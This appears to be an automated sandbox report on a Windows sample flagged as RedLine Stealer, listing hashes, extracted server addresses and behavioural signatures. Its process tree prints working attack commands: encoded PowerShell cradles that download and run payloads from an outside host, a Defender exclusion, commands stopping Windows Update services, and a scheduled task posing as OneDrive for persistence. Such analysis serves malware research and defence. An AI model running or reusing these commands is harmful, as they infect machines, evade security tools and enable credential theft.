Analysis
-
max time kernel
46s -
max time network
86s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
09/05/2023, 12:58
Static task
static1
Behavioral task
behavioral1
Sample
51acdf673cd5c98225ac9c3893c1569c7458513b4f00bbb39c5818e3133466ea.exe
Resource
win10v2004-20230220-en
General
-
Target
51acdf673cd5c98225ac9c3893c1569c7458513b4f00bbb39c5818e3133466ea.exe
-
Size
135KB
-
MD5
ad8afc145a12c83233a26a2f1db86133
-
SHA1
343ba0dcec0c8e06a2e8fe7fabad0331ae39ed3f
-
SHA256
51acdf673cd5c98225ac9c3893c1569c7458513b4f00bbb39c5818e3133466ea
-
SHA512
196d208eae999c15f3d85732ca92153f52f53190f8edbe47651654bbe4170bd7ae068a7325d990279e612203f8c612998ad0cf0bdde694ac45a061f18149da1b
-
SSDEEP
3072:mgJXgANP8n7qkMrXlVdq0ZtYJ3Zg+1qBiHNl8aX+EN:DdHkMr1VY0ZtYj7Nl8aX++
Malware Config
Extracted
http://62.204.41.23/file.png
Extracted
http://62.204.41.23/r.png
Extracted
http://62.204.41.23/o.png
Extracted
redline
[ PRO ]
185.161.248.16:26885
-
auth_value
b4958da54d1cdd9d9b28330afda1cc3c
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4212 created 3260 4212 OneDrive.exe 56 -
Blocklisted process makes network request 3 IoCs
flow pid Process 21 4616 powershell.exe 22 1348 powershell.exe 23 4000 powershell.exe -
Downloads MZ/PE file
-
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion OneDrive.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion OneDrive.exe -
Executes dropped EXE 1 IoCs
pid Process 4212 OneDrive.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 25 ipinfo.io -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 4616 set thread context of 3964 4616 powershell.exe 98 PID 1348 set thread context of 3484 1348 powershell.exe 99 -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1196 sc.exe 3892 sc.exe 952 sc.exe 4952 sc.exe 3332 sc.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RegSvcs.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0 RegSvcs.exe -
Suspicious behavior: EnumeratesProcesses 17 IoCs
pid Process 4000 powershell.exe 1348 powershell.exe 1348 powershell.exe 4240 powershell.exe 4240 powershell.exe 4616 powershell.exe 4616 powershell.exe 4240 powershell.exe 4000 powershell.exe 4000 powershell.exe 1348 powershell.exe 4616 powershell.exe 4212 OneDrive.exe 4212 OneDrive.exe 3236 powershell.exe 3236 powershell.exe 3236 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 4000 powershell.exe Token: SeDebugPrivilege 1348 powershell.exe Token: SeDebugPrivilege 4240 powershell.exe Token: SeDebugPrivilege 4616 powershell.exe Token: SeDebugPrivilege 3964 RegSvcs.exe Token: SeDebugPrivilege 3236 powershell.exe -
Suspicious use of WriteProcessMemory 26 IoCs
description pid Process procid_target PID 236 wrote to memory of 4240 236 51acdf673cd5c98225ac9c3893c1569c7458513b4f00bbb39c5818e3133466ea.exe 97 PID 236 wrote to memory of 4240 236 51acdf673cd5c98225ac9c3893c1569c7458513b4f00bbb39c5818e3133466ea.exe 97 PID 236 wrote to memory of 4616 236 51acdf673cd5c98225ac9c3893c1569c7458513b4f00bbb39c5818e3133466ea.exe 96 PID 236 wrote to memory of 4616 236 51acdf673cd5c98225ac9c3893c1569c7458513b4f00bbb39c5818e3133466ea.exe 96 PID 236 wrote to memory of 4000 236 51acdf673cd5c98225ac9c3893c1569c7458513b4f00bbb39c5818e3133466ea.exe 90 PID 236 wrote to memory of 4000 236 51acdf673cd5c98225ac9c3893c1569c7458513b4f00bbb39c5818e3133466ea.exe 90 PID 236 wrote to memory of 1348 236 51acdf673cd5c98225ac9c3893c1569c7458513b4f00bbb39c5818e3133466ea.exe 91 PID 236 wrote to memory of 1348 236 51acdf673cd5c98225ac9c3893c1569c7458513b4f00bbb39c5818e3133466ea.exe 91 PID 4616 wrote to memory of 3964 4616 powershell.exe 98 PID 4616 wrote to memory of 3964 4616 powershell.exe 98 PID 4616 wrote to memory of 3964 4616 powershell.exe 98 PID 4616 wrote to memory of 3964 4616 powershell.exe 98 PID 4616 wrote to memory of 3964 4616 powershell.exe 98 PID 4616 wrote to memory of 3964 4616 powershell.exe 98 PID 4616 wrote to memory of 3964 4616 powershell.exe 98 PID 4616 wrote to memory of 3964 4616 powershell.exe 98 PID 1348 wrote to memory of 3484 1348 powershell.exe 99 PID 1348 wrote to memory of 3484 1348 powershell.exe 99 PID 1348 wrote to memory of 3484 1348 powershell.exe 99 PID 1348 wrote to memory of 3484 1348 powershell.exe 99 PID 1348 wrote to memory of 3484 1348 powershell.exe 99 PID 1348 wrote to memory of 3484 1348 powershell.exe 99 PID 1348 wrote to memory of 3484 1348 powershell.exe 99 PID 1348 wrote to memory of 3484 1348 powershell.exe 99 PID 4000 wrote to memory of 4212 4000 powershell.exe 104 PID 4000 wrote to memory of 4212 4000 powershell.exe 104
Processes
-
C:\Users\Admin\AppData\Local\Temp\51acdf673cd5c98225ac9c3893c1569c7458513b4f00bbb39c5818e3133466ea.exe"C:\Users\Admin\AppData\Local\Temp\51acdf673cd5c98225ac9c3893c1569c7458513b4f00bbb39c5818e3133466ea.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:236 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4000 -
C:\Users\Admin\AppData\Roaming\OneDrive.exe"C:\Users\Admin\AppData\Roaming\OneDrive.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks BIOS information in registry
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4212
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1348 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵PID:3484
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4616 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:3964
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4240
-
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3260
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3236
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:3292
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:3892
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:952
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:4952
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:3332
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1196
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:3424
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:4324
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:4128
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:4976
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:5024
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:1176
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yramilr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }2⤵PID:4808
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
1KB
MD56f4cc7e6de6b3389079cebf4386f53b8
SHA18b6c009d98da297c3b78cdb9bc7190d4b511e684
SHA2568e55c462848e00013de18e1ee248c2df9233e75f510a17090fc0e3fb22bfef91
SHA5122eb126c745f90d0213cc227885b856ede0b33458d02c4313a89981db90c1b847d573a8109b3d46b17a808511716c2c006bbefa86b1ec5f2f710587db4477ad17
-
Filesize
1KB
MD5f1549cc7b079aafe5a84d4589e478849
SHA17b075f7b88d8a2c5d9cd27090a514d60de5bbd4d
SHA2566adfd6fd5b210f2cbf2ca9f3a89a27c937fba828a9c00888c1c3f86c6c4b38d5
SHA5127ff46d7a36ebb1607f923d151e5ae3e17559bc18f5f621be0bbb16365ddcdb255794fe47cfb354cf0f58f6763bc628c1c98df7933f927e20d93dbc2c5519fc20
-
Filesize
1KB
MD5f1549cc7b079aafe5a84d4589e478849
SHA17b075f7b88d8a2c5d9cd27090a514d60de5bbd4d
SHA2566adfd6fd5b210f2cbf2ca9f3a89a27c937fba828a9c00888c1c3f86c6c4b38d5
SHA5127ff46d7a36ebb1607f923d151e5ae3e17559bc18f5f621be0bbb16365ddcdb255794fe47cfb354cf0f58f6763bc628c1c98df7933f927e20d93dbc2c5519fc20
-
Filesize
944B
MD5c668035e150c1830e7eeeb21061e5956
SHA1db098c3a81998ad385c69e2e62824522a12a7b56
SHA256a5e00ecad3f9279c0780a177711280ba4068d5f0b19559d94267826f9a62792b
SHA512248add6bfc6d7fd5fd279b99369c2f54d51ae7a6259582485915dc907172f1c514b125a6c3462b0db710336d31736fb6ce7cbf3672dd4c24db7578bf234832d5
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
8.7MB
MD59dc5d44e7055db45d497d1f57f7f2ca9
SHA1943a84709d9f0c75ebcf9a7aedac98a31f38d133
SHA256bfc80742ac9502fe2a0d3e4f540aef5b7805f0d323d7e1e6e35761904d5da232
SHA512d436eb8bab8145cdf03129ef6a27f0ea1250d57be94bf2f9de8f0daa0ca80d7c6a4832213b3d56a1394b50cff67cb276018428178c454d8003874c1f82a8a84d
-
Filesize
8.7MB
MD59dc5d44e7055db45d497d1f57f7f2ca9
SHA1943a84709d9f0c75ebcf9a7aedac98a31f38d133
SHA256bfc80742ac9502fe2a0d3e4f540aef5b7805f0d323d7e1e6e35761904d5da232
SHA512d436eb8bab8145cdf03129ef6a27f0ea1250d57be94bf2f9de8f0daa0ca80d7c6a4832213b3d56a1394b50cff67cb276018428178c454d8003874c1f82a8a84d